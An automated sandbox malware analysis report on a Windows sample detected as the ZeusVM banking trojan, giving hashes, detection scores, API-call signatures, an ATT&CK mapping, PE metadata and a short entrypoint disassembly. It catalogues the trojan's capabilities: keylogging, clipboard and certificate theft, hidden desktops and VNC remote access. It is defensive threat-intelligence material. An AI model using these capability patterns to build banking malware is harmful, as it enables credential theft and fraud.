Analysis Report MjjnJ90i5q

Overview

General Information

Sample Name:MjjnJ90i5q (renamed file extension from none to exe)
Analysis ID:359684
MD5:6c7e2255031fdbb8efd157c2b4179319
SHA1:f77cf9bb93945feb70c2519debbfbaec476156f3
SHA256:277371d2f69231c4beced4f5898f2a6bd57f1fe7488e50decc6e7ea63ad5677f
Tags:uncategorized
Infos:

Detection

ZeusVM
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected ZeusVM e-Banking Trojan
Multi AV Scanner detection for submitted file
Contains VNC / remote desktop functionality (version string found)
Machine Learning detection for sample
Antivirus or Machine Learning detection for unpacked file
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
May initialize a security null descriptor
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • MjjnJ90i5q.exe (PID: 6584 cmdline: 'C:\Users\user\Desktop\MjjnJ90i5q.exe' MD5: 6C7E2255031FDBB8EFD157C2B4179319)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: MjjnJ90i5q.exe, Avira: detected
Multi AV Scanner detection for submitted file
Source: MjjnJ90i5q.exe, Virustotal: Detection: 87%
Source: MjjnJ90i5q.exe, ReversingLabs: Detection: 87%
Machine Learning detection for sample
Source: MjjnJ90i5q.exe, Joe Sandbox ML: detected
Source: 0.2.MjjnJ90i5q.exe.400000.0.unpack, Avira: Label: TR/Kazy.MK
Source: 0.0.MjjnJ90i5q.exe.400000.0.unpack, Avira: Label: TR/Kazy.MK
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_00412C66 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,0_2_00412C66
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_0040D161 CryptUnprotectData,LocalFree,0_2_0040D161

Compliance:

Uses 32bit PE files
Source: MjjnJ90i5q.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_0041CCDE GetFileAttributesExW,ReadProcessMemory,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,0_2_0041CCDE
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_0041702F FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,0_2_0041702F
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_004170EA FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,0_2_004170EA
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_00413803 CreateFileW,WaitForSingleObject,InternetReadFile,WriteFile,FlushFileBuffers,CloseHandle,0_2_00413803
Source: MjjnJ90i5q.exe, String found in binary or memory: http://www.google.com/webhp
Source: MjjnJ90i5q.exe, String found in binary or memory: http://www.google.com/webhpbc-vMY.txt
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_00419823 NtCreateUserProcess,NtCreateThread,LdrLoadDll,GetFileAttributesExW,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetQueryDataAvailable,HttpQueryInfoA,closesocket,send,WSASend,OpenInputDesktop,SwitchDesktop,DefWindowProcW,DefWindowProcA,DefDlgProcW,DefDlgProcA,DefFrameProcW,DefFrameProcA,DefMDIChildProcW,DefMDIChildProcA,CallWindowProcW,CallWindowProcA,RegisterClassW,RegisterClassA,RegisterClassExW,RegisterClassExA,BeginPaint,EndPaint,GetDCEx,GetDC,GetWindowDC,ReleaseDC,GetUpdateRect,GetUpdateRgn,GetMessagePos,GetCursorPos,SetCursorPos,SetCapture,ReleaseCapture,GetCapture,GetMessageW,GetMessageA,PeekMessageW,PeekMessageA,TranslateMessage,GetClipboardData,PFXImportCertStore,0_2_00419823
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_0041D1BF EnterCriticalSection,GetTickCount,LeaveCriticalSection,GetKeyboardState,ToUnicode,TranslateMessage,0_2_0041D1BF
Source: MjjnJ90i5q.exe, 00000000.00000002.230060266.00000000006DA000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Detected ZeusVM e-Banking Trojan
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_00404F00 lstrcmpiA,lstrcmpiA,lstrcmpiA,CloseHandle,0_2_00404F00
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_004090BA OpenWindowStationW,CreateWindowStationW,GetProcessWindowStation,OpenDesktopW,CreateDesktopW,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,CloseDesktop,CloseWindowStation,0_2_004090BA
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_00419823 NtCreateUserProcess,NtCreateThread,LdrLoadDll,GetFileAttributesExW,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetQueryDataAvailable,HttpQueryInfoA,closesocket,send,WSASend,OpenInputDesktop,SwitchDesktop,DefWindowProcW,DefWindowProcA,DefDlgProcW,DefDlgProcA,DefFrameProcW,DefFrameProcA,DefMDIChildProcW,DefMDIChildProcA,CallWindowProcW,CallWindowProcA,RegisterClassW,RegisterClassA,RegisterClassExW,RegisterClassExA,BeginPaint,EndPaint,GetDCEx,GetDC,GetWindowDC,ReleaseDC,GetUpdateRect,GetUpdateRgn,GetMessagePos,GetCursorPos,SetCursorPos,SetCapture,ReleaseCapture,GetCapture,GetMessageW,GetMessageA,PeekMessageW,PeekMessageA,TranslateMessage,GetClipboardData,PFXImportCertStore,0_2_00419823
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_00408D01 NtQueryInformationProcess,CloseHandle,NtCreateThread,0_2_00408D01
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_00408DB8 NtCreateUserProcess,GetProcessId,GetThreadContext,SetThreadContext,VirtualFreeEx,CloseHandle,0_2_00408DB8
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_004132E3 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,0_2_004132E3
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_0040A8D1 InitiateSystemShutdownExW,ExitWindowsEx,0_2_0040A8D1
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_00406B42 CreateMutexW,GetLastError,CloseHandle,CloseHandle,ExitWindowsEx,OpenEventW,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,ReadProcessMemory,Sleep,IsWellKnownSid,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,0_2_00406B42
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_0041115E 0_2_0041115E
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_004021EB 0_2_004021EB
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_00412B72 0_2_00412B72
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_00414714 0_2_00414714
Source: MjjnJ90i5q.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: classification engine, Classification label: mal72.bank.troj.winEXE@1/0@0/0
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_0040C85B CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,0_2_0040C85B
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_0040C6E6 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,0_2_0040C6E6
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_0041308D GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,0_2_0041308D
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_0041A01E CloseHandle,CloseHandle,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,CloseHandle,GetLengthSid,CloseHandle,Process32NextW,CloseHandle,0_2_0041A01E
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_0040D880 CoCreateInstance,0_2_0040D880
Source: MjjnJ90i5q.exe, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: MjjnJ90i5q.exe, Virustotal: Detection: 87%
Source: MjjnJ90i5q.exe, ReversingLabs: Detection: 87%
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_0041CCDE GetFileAttributesExW,ReadProcessMemory,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,0_2_0041CCDE
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_00402475 push es; iretd 0_2_00402484
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_00402B41 push cs; iretd 0_2_00402B50
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_00402B0B push cs; ret 0_2_00402B20
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_0041A1A9 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadImageW,GetIconInfo,GetCursorPos,DrawIcon,lstrcmpiW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,0_2_0041A1A9
Source: all processes, Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_0041702F FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,0_2_0041702F
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_004170EA FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,0_2_004170EA
Source: MjjnJ90i5q.exe, 00000000.00000002.230060266.00000000006DA000.00000004.00000020.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_00419823 NtCreateUserProcess,NtCreateThread,LdrLoadDll,GetFileAttributesExW,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetQueryDataAvailable,HttpQueryInfoA,closesocket,send,WSASend,OpenInputDesktop,SwitchDesktop,DefWindowProcW,DefWindowProcA,DefDlgProcW,DefDlgProcA,DefFrameProcW,DefFrameProcA,DefMDIChildProcW,DefMDIChildProcA,CallWindowProcW,CallWindowProcA,RegisterClassW,RegisterClassA,RegisterClassExW,RegisterClassExA,BeginPaint,EndPaint,GetDCEx,GetDC,GetWindowDC,ReleaseDC,GetUpdateRect,GetUpdateRgn,GetMessagePos,GetCursorPos,SetCursorPos,SetCapture,ReleaseCapture,GetCapture,GetMessageW,GetMessageA,PeekMessageW,PeekMessageA,TranslateMessage,GetClipboardData,PFXImportCertStore,0_2_00419823
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_0041CCDE GetFileAttributesExW,ReadProcessMemory,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,0_2_0041CCDE
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_00405BBA mov edx, dword ptr fs:[00000030h] 0_2_00405BBA
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_00405EFF GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,HeapCreate,GetProcessHeap,InitializeCriticalSection,WSAStartup,CreateEventW,GetLengthSid,GetCurrentProcessId,0_2_00405EFF
Source: all processes, Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_00414FB0 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,LocalFree,0_2_00414FB0
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_0041848E RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetLocalTime,0_2_0041848E
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_0040C68A GetUserNameExW,0_2_0040C68A
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_00411AEB GetTimeZoneInformation,0_2_00411AEB
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_0041D883 GetVersionExW,GetNativeSystemInfo,0_2_0041D883
Source: MjjnJ90i5q.exe, Binary or memory string: S:(ML;;NRNWNX;;;LW)

Remote Access Functionality:

Contains VNC / remote desktop functionality (version string found)
Source: MjjnJ90i5q.exe, String found in binary or memory: RFB 003.003
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_00414DE1 socket,bind,closesocket,0_2_00414DE1
Source: C:\Users\user\Desktop\MjjnJ90i5q.exe, Code function: 0_2_00414B03 socket,bind,listen,closesocket,0_2_00414B03

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts1 | Native API1 | Create Account1 | Valid Accounts1 | Valid Accounts1 | Input Capture21 | Network Share Discovery1 | Remote Desktop Protocol1 | Input Capture21 | Exfiltration Over Other Network Medium | Encrypted Channel2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot1
Default Accounts | Scheduled Task/Job | Valid Accounts1 | Access Token Manipulation11 | Access Token Manipulation11 | LSASS Memory | System Time Discovery2 | Remote Desktop Protocol | Archive Collected Data1 | Exfiltration Over Bluetooth | Remote Access Software1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Application Shimming1 | Application Shimming1 | Obfuscated Files or Information1 | Security Account Manager | Security Software Discovery11 | SMB/Windows Admin Shares | Clipboard Data1 | Automated Exfiltration | Ingress Tool Transfer1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Install Root Certificate1 | NTDS | Process Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing1 | LSA Secrets | Account Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Owner/User Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | File and Directory Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery3 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
MjjnJ90i5q.exe | 88% | Virustotal |
MjjnJ90i5q.exe | 88% | ReversingLabs | Win32.Trojan.Zeus
MjjnJ90i5q.exe | 100% | Avira | TR/Kazy.MK
MjjnJ90i5q.exe | 100% | Joe Sandbox ML |

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
0.2.MjjnJ90i5q.exe.400000.0.unpack | 100% | Avira | TR/Kazy.MK
0.0.MjjnJ90i5q.exe.400000.0.unpack | 100% | Avira | TR/Kazy.MK

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:31.0.0 Emerald
Analysis ID:359684
Start date:28.02.2021
Start time:16:35:20
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 45s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:MjjnJ90i5q (renamed file extension from none to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:23
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal72.bank.troj.winEXE@1/0@0/0
EGA Information:Failed
HDC Information:
  • Successful, ratio: 99.6% (good quality ratio 92.3%)
  • Quality average: 82.6%
  • Quality standard deviation: 29.5%
HCA Information:Failed
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
  • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type:MS-DOS executable
Entropy (8bit):6.676837061779834
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.94%
  • DOS Executable Borland Pascal 7.0x (2037/25) 0.02%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • VXD Driver (31/22) 0.00%
File name:MjjnJ90i5q.exe
File size:141824
MD5:6c7e2255031fdbb8efd157c2b4179319
SHA1:f77cf9bb93945feb70c2519debbfbaec476156f3
SHA256:277371d2f69231c4beced4f5898f2a6bd57f1fe7488e50decc6e7ea63ad5677f
SHA512:8a992f53395fa4a0afbe9354a39cfee642b9f8b396b21317d16b21029221a5c379fbe16812ea85b4296064157f2053f2413ee5a1aa76c1fa3392d26fb79bb406
SSDEEP:3072:qoOfm/6UGHsQQMZa0EuNcFsC+5gvVgb1CztHnh73Yrx76hQB:qoOfGgLQMEuNclvVgb1CQrxKQB
File Content Preview:MZ......................................................................................................................................................................................................................PE..L......M.....................:.....

File Icon

Icon Hash:00828e8e8686b000

Static PE Info

General

Entrypoint:0x406e89
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:0x4D87B88B [Mon Mar 21 20:43:55 2011 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:3109dcd15fd9962082a2ee5da8d7b1e7

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push 00000000h
xor bl, bl
call 00007F1F14D83A7Bh
test al, al
je 00007F1F14D84AEAh
push 00008007h
mov byte ptr [ebp-10h], bl
mov byte ptr [ebp-0Ch], 00000001h
mov byte ptr [ebp-01h], bl
call dword ptr [0040127Ch]
lea eax, dword ptr [ebp-08h]
push eax
call dword ptr [00401280h]
push eax
call dword ptr [004012C4h]
test eax, eax
je 00007F1F14D84A97h
xor edx, edx
cmp dword ptr [ebp-08h], edx
jle 00007F1F14D84A51h
mov ecx, dword ptr [eax+edx*4]
test ecx, ecx
je 00007F1F14D84A44h
cmp word ptr [ecx], 002Dh
jne 00007F1F14D84A3Eh
movzx ecx, word ptr [ecx+02h]
cmp ecx, 66h
je 00007F1F14D84A31h
cmp ecx, 69h
je 00007F1F14D84A28h
cmp ecx, 6Eh
je 00007F1F14D84A1Dh
cmp ecx, 76h
jne 00007F1F14D84A26h
mov byte ptr [ebp-01h], 00000001h
jmp 00007F1F14D84A20h
mov byte ptr [ebp-0Ch], 00000000h
jmp 00007F1F14D84A1Ah
mov bl, 01h
jmp 00007F1F14D84A16h
mov byte ptr [ebp-10h], 00000001h
inc edx
cmp edx, dword ptr [ebp-08h]
jl 00007F1F14D849D3h
push eax
call dword ptr [00401234h]
test bl, bl
je 00007F1F14D84A19h
call 00007F1F14D84444h
jmp 00007F1F14D84A46h
cmp byte ptr [ebp-01h], 00000000h
je 00007F1F14D84A35h
call 00007F1F14D9862Bh
call 00007F1F14D89E8Fh
test byte ptr [00422530h], 00000004h
mov bl, al
je 00007F1F14D84A2Dh
push 00000000h
mov eax, 00423E78h
call 00007F1F14D98488h
jmp 00007F1F14D84A1Fh

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1f7f4 | 0x118 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25000 | 0x11a8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x5a0 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x206d4 | 0x20800 | False | 0.641256009615 | data | 6.70132877585 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data | 0x22000 | 0x2050 | 0x400 | False | 0.21875 | data | 1.58300409118 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc | 0x25000 | 0x166a | 0x1800 | False | 0.621744791667 | data | 5.62347488179 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL | Import
KERNEL32.dll | HeapAlloc, SystemTimeToFileTime, SetFilePointerEx, HeapFree, CreateDirectoryW, GetProcessHeap, IsBadReadPtr, SetFileTime, VirtualQueryEx, OpenProcess, Thread32First, WideCharToMultiByte, ReadProcessMemory, HeapDestroy, HeapCreate, Thread32Next, ReadFile, GetTimeZoneInformation, MultiByteToWideChar, GetTempPathW, GetFileSizeEx, OpenMutexW, GetLastError, VirtualProtectEx, SetLastError, FindClose, CreateProcessW, RemoveDirectoryW, FindNextFileW, VirtualProtect, CreateToolhelp32Snapshot, GetFileTime, FileTimeToLocalFileTime, GetVolumeNameForVolumeMountPointW, DeleteFileW, GetFileInformationByHandle, SetFileAttributesW, CreateThread, GetLocalTime, CreateRemoteThread, Process32FirstW, Process32NextW, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, TlsAlloc, TlsFree, WTSGetActiveConsoleSessionId, GlobalLock, GlobalUnlock, GetNativeSystemInfo, GetTickCount, EnterCriticalSection, SetEndOfFile, FindFirstFileW, CreateMutexW, HeapReAlloc, GetTempFileNameW, FileTimeToDosDateTime, GetEnvironmentVariableW, LoadLibraryW, FreeLibrary, GetPrivateProfileIntW, FlushFileBuffers, GetSystemTime, ResetEvent, TerminateProcess, TlsSetValue, TlsGetValue, GetUserDefaultUILanguage, MoveFileExW, ExpandEnvironmentStringsW, GetProcessId, VirtualAlloc, SetThreadContext, GetThreadContext, ReleaseMutex, LoadLibraryA, GetCurrentThreadId, CreateFileW, GetFileAttributesW, LeaveCriticalSection, InitializeCriticalSection, WriteFile, GetPrivateProfileStringW, WriteProcessMemory, LocalFree, GetCurrentProcessId, CloseHandle, DuplicateHandle, OpenEventW, GetFileAttributesExW, lstrcmpiW, WaitForMultipleObjects, CreateEventW, GetProcAddress, GetModuleFileNameW, GetVersionExW, Sleep, VirtualFreeEx, VirtualFree, GetModuleHandleW, SetEvent, GetComputerNameW, SetErrorMode, GetCommandLineW, ExitProcess, lstrcmpiA, SetThreadPriority, GetCurrentThread, VirtualAllocEx, WaitForSingleObject
USER32.dll | CharLowerA, CharUpperW, SetWindowLongW, GetWindow, DispatchMessageW, GetSystemMetrics, CharLowerW, EndPaint, GetUpdateRgn, GetWindowDC, FillRect, DrawEdge, BeginPaint, GetUpdateRect, GetDC, IntersectRect, TranslateMessage, ReleaseDC, PostThreadMessageW, EqualRect, PrintWindow, DefWindowProcW, CreateDesktopW, SetProcessWindowStation, RegisterClassExW, CloseWindowStation, CreateWindowStationW, GetProcessWindowStation, OpenDesktopW, CloseDesktop, GetKeyboardState, ToUnicode, OpenInputDesktop, RegisterWindowMessageW, GetMenuItemID, SetKeyboardState, GetSubMenu, MenuItemFromPoint, GetMenu, GetMenuItemRect, TrackPopupMenuEx, SystemParametersInfoW, GetClassNameW, GetMenuState, GetMenuItemCount, HiliteMenuItem, EndMenu, GetShellWindow, DrawIcon, GetIconInfo, MapVirtualKeyW, RegisterClassExA, DefDlgProcW, GetClipboardData, DefWindowProcA, WindowFromPoint, DefMDIChildProcW, DefFrameProcA, GetDCEx, SwitchDesktop, CharToOemW, DefMDIChildProcA, RegisterClassW, CharLowerBuffA, ExitWindowsEx, CallWindowProcA, CallWindowProcW, DefFrameProcW, RegisterClassA, SetThreadDesktop, GetUserObjectInformationW, OpenWindowStationW, GetMessageA, GetWindowRect, GetMessageW, SetCapture, PostMessageW, GetParent, GetWindowInfo, GetClassLongW, GetCapture, SetCursorPos, GetWindowLongW, GetAncestor, PeekMessageW, PeekMessageA, SetWindowPos, GetTopWindow, LoadImageW, MsgWaitForMultipleObjects, GetThreadDesktop, IsRectEmpty, GetWindowThreadProcessId, GetMessagePos, MapWindowPoints, SendMessageW, ReleaseCapture, IsWindow, SendMessageTimeoutW, GetCursorPos, DefDlgProcA
